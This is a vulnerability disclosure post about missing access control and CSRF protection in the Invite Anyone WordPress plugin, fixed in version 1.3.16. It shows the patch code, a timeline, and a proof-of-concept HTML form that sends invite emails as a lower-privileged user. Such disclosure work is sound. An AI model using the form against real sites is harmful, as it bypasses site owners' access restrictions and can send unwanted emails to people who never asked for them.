Improper Access Control Vulnerability in Invite Anyone
At the beginning of the year we took a couple of actions to improve our inclusion of vulnerabilities where there has not been a report on the vulnerability released by the discoverer so that we could expand the number of vulnerabilities we include in our dataset. First, we expanded our monitoring of changes made to plugins to spot more of those situations. Second, we started releasing posts with the details of those vulnerabilities, which allows us to provide more information on the vulnerabilities to our customers than we otherwise could. That has also led to us spotting additional vulnerabilities in those plugins, just as we have when reviewing reports for other vulnerabilities.
While putting together a post on a vulnerability that had existed in the plugin Invite Anyone we noticed another related vulnerability. The original vulnerability involved a lack of enforcement of an admin set restriction on users setting the subject and message of invite email sent through the plugin. While looking into the details of that vulnerability we noticed that the plugin also didn’t enforce access control restrictions that can be set for sending invite emails through the plugin. While the relevant page for sending emails was not shown to user that should not be able to send them, a user could still send a request to cause those emails to be sent. The sending of emails also lacked protection against cross-site request forgery (CSRF), which would have had the impact of stopping those requests as well. We notified the developer of those issues and they quickly got back to us and they have now released version 1.3.16, which resolves the vulnerabilities.
The vulnerabilities were fixed by adding the following code to the function invite_anyone_catch_send() in the file /by-email/by-email.php:
423 424 425 426 427 428 429 | if ( ! invite_anyone_access_test() ) { return; } if ( ! isset( $_POST['ia-send-by-email-nonce'] ) || ! wp_verify_nonce( wp_unslash( $_POST['ia-send-by-email-nonce'] ), 'invite_anyone_send_by_email' ) ) { return; } |
The function invite_anyone_access_test() checks if the user is permitted to send invite emails and the second part of that checks if a valid nonce has been included with the request to send the invite emails (the nonce has been added to the relevant form elsewhere in the code) to prevent CSRF. If either of those checks fail the functions exits and the invite emails are not sent.
Proof of Concept
On the page /wp-admin/admin.php?page=invite-anyone&subpage=access-control set it so that only Administrator-level users are allowed to send invite emails. Then when logged in as a lower level user submit the proof of concept below and the invite email will be sent.
Make sure to replace “[path to WordPress]” with the location of WordPress, “[username] with the username of the user making the request, and “[email address]” with the email address to send the email invite to.
<html> <body> <form action="http://[path to WordPress]/members/[username]/invite-anyone/sent-invites/send/" method="POST"> <input type="hidden" name="invite_anyone_email_addresses" value="[email address]"> <input type="hidden" name="invite_anyone_custom_subject" value="An invitation to join the test community."> <input type="hidden" name="invite_anyone_custom_message" value="You have been invited by test to join the test community. Visit test's profile at http://localhost/members/test/."> <input type="hidden" name="invite-anyone-submit" value="Send Invites "> <input type="submit" value="Submit" /> </form> </body> </html>
Timeline
- March 20, 2017 – Developer notified.
- March 20, 2017 – Developer responds.
- March 22, 2017 – Version 1.3.16 released, which fixes vulnerability.